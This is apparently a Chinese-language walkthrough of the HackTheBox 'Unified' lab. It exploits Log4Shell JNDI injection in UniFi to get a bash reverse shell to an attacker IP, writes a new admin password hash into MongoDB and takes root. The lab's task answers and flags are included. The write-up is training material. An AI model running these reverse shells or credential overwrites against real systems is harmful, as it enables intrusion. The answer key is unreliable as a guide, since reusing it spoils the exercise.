HackTheBox-Starting Point--Tier 2---Unified

文章目录

  • [一 Unified 测试过程](#一 Unified 测试过程)
    • [1.1 打点](#1.1 打点)
    • [1.2 权限获取](#1.2 权限获取)
    • [1.3 权限提升](#1.3 权限提升)
  • [二 题目](#二 题目)

一 Unified 测试过程


1.1 打点

**  1.端口扫描**

c 复制代码
nmap -sV -sC 

**  2.访问8080端口**

页面跳转到:https://10.129.96.149:8443/manage/account/login?redirect=%2Fmanage
  观察到版本号为unifi 6.4.54

**  3.搜索Unifi 6.5.54是否存在相关漏洞**

发现Unifi 6.5.54版本存在 CVE-2021-44228

c 复制代码
JNDI注入:
${jndi:ldap://10.10.14.20/whatever}"

虽然响应报错,但是${jndi:ldap://10.10.14.35/whatever}"正在执行


1.2 权限获取


JNDI注入工具地址:https://github.com/welk1n/JNDI-Injection-Exploit

使用JNDI注入工具进行反弹shell:

php 复制代码
# shell
bash -i >& /dev/tcp/10.10.14.35/4444 0>&1
php 复制代码
# 对shell进行base64编码
bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4zNS80NDQ0IDA+JjEK}|{base64,-d}|{bash,-i}
php 复制代码
# 工具执行
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4zNS80NDQ0IDA+JjEK}|{base64,-d}|{bash,-i}" -A "10.10.14.35"
php 复制代码
# 攻击机器执行监听
ncat -lnvp 4444

burpsuite执行payload:

获取到shell:

查找user.flag:


1.3 权限提升


**  1.查看系统运行服务**

php 复制代码
# 查看进程,发现mongod
ps
php 复制代码
# 运行在27117端口
ps aux | grep mongo

**  2.尝试与mongodb数据库交互**

google搜索UniFi Default Database可以发现,UniFi默认数据库为ace

c 复制代码
mongo --port 27117 ace --eval "db.admin.find().forEach(printjson)"

输出可以看出,administrator用户与其他多个用户,密码为hash


**  3.尝试获取administrator用户密码**

php 复制代码
# 从$6$可知,密码采用SHA512
$6$Ry6Vdbse$8enMR5Znxoo.WfCMd/Xk65GwuQEPx1M.QP8/qHiQV0PvUc3uHuonK4WcTQFN1CRk3GwQaquyVwCVq8iQgPTt4.

既然无法破解,尝试是否可以使用新密码的sha 512 hash 替换原本的密码,使用mkpasswd工具:

c 复制代码
mkpasswd -m sha-512 新密码
c 复制代码
mongo --port 27117 ace --eval 'db.admin.update({"_id" : ObjectId("61ce278f46e0fb0012d47ee4")},{$set:{"x_shadow":"$6$nU10gu5LmDqVlHpK$FcKCyQI/SPV/L6oZEbqOLf1ukIk./E18MRnDLaiDY7PcTn/AF2k9p0C0F6qH1Ys6V30Hxc2.eSIQd.KKmrsNg1"}})'

**  4.使用administrator:Test1234登录网站**

发现存在SSH登录身份验证设置:

**  5.获取到 root:NotACrackablePassword4U2022 使用ssh连接
**

二 题目


++Tags++

c 复制代码
Web、Vulnerability Assessment、Databases、Injection、Custom Applications、Outdated Software、MongoDB、Java、Reconnaissance、Clear Text Credentials、Default Credentials、Code Injection

译文:漏洞评估、数据库、注入、自定义应用程序、过时软件、MongoDB、Java、侦察、明文凭据、默认凭据、代码注入

++Connect++

c 复制代码
To attack the target machine, you must be on the same network.Connect to the Starting Point VPN using one of the following options.
It may take a minute for HTB to recognize your connection.If you don't see an update after 2-3 minutes, refresh the page.

译文:要攻击目标机器,您必须位于同一网络上。使用以下选项之一连接到起点 VPN。
HTB 可能需要一分钟才能识别您的连接。如果 2-3 分钟后没有看到更新,请刷新页面。

++SPAWN MACHINE++

c 复制代码
Spawn the target machine and the IP will show here.

译文:生成目标机器,IP 将显示在此处

++TASK 1++

c 复制代码
Which are the first four open ports?

译文:前四个开放端口是哪四个?

答:22,6789,8080,8443

++TASK 2++

c 复制代码
What is the title of the software that is running running on port 8443?

译文:在端口 8443 上运行的软件的标题是什么?

答:UniFi Network

++TASK 3++

c 复制代码
What is the version of the software that is running?

译文:正在运行的软件版本是什么?

答:6.4.54

++TASK 4++

c 复制代码
What is the CVE for the identified vulnerability?

译文:已识别漏洞的 CVE 是什么?

答:CVE-2021-44228

++TASK 5++

c 复制代码
What protocol does JNDI leverage in the injection?

译文:JNDI在注入中使用什么协议?

答:ldap

++TASK 6++

c 复制代码
What tool do we use to intercept the traffic, indicating the attack was successful?

译文:我们用什么工具拦截流量,表明攻击成功?

答:tcpdump

++TASK 7++

c 复制代码
What port do we need to inspect intercepted traffic for?

译文:我们需要检查哪个端口的拦截流量?

答:389

++TASK 8++

c 复制代码
What port is the MongoDB service running on?

译文:MongoDB 服务运行在哪个端口上?

答:27117

++TASK 9++

c 复制代码
What is the default database name for UniFi applications?

译文:UniFi 应用程序的默认数据库名称是什么?

答:ace

++TASK 10++

c 复制代码
What is the function we use to enumerate users within the database in MongoDB?

译文:我们用什么函数来枚举MongoDB数据库中的用户?

答:db.admin.find()

++TASK 11++

c 复制代码
What is the function we use to update users within the database in MongoDB?

译文:我们用什么函数来更新MongoDB数据库中的用户?

答:db.admin.update()

++TASK 12++

c 复制代码
What is the password for the root user?

译文:root 用户的密码是什么?

答:NotACrackablePassword4U2022

++SUBMIT FLAG++

c 复制代码
Submit user flag

译文:用户flag

答:6ced1a6a89e666c0620cdb10262ba127

++SUBMIT FLAG++

c 复制代码
Submit root flag

译文:提交root flag

答:e50bc93c75b634e4b272d2f771c33681

相关推荐
你的微笑,乱了夏天1 天前
linux centos 7 安装 mongodb7
数据库·mongodb
来一杯龙舌兰2 天前
【MongoDB】使用 MongoDB 存储日志、审批、MQ等数据的案例及优点
数据库·mongodb
技术路上的苦行僧2 天前
分布式专题(8)之MongoDB存储原理&多文档事务详解
数据库·分布式·mongodb
Tttian6222 天前
Pycharm访问MongoDB数据库
数据库·mongodb·pycharm
Benjamin Cheung2 天前
starter-data-mongodb
数据库·mongodb
2301_801483692 天前
MongoDB(下)
数据库·mongodb
s_fox_3 天前
Mongodb 集群搭建
数据库·mongodb
赶紧写完去睡觉3 天前
数据库管理系统——NoSQL之文档数据库(MongoDB)
数据库·mongodb·nosql
ziyu_jia4 天前
MongoDB、Mongoose使用教程
前端·数据库·mongodb·node.js·mongoose
颜淡慕潇5 天前
【数据库系列】Spring Boot 集成 MongoDB Template 的详细步骤
数据库·spring boot·后端·mongodb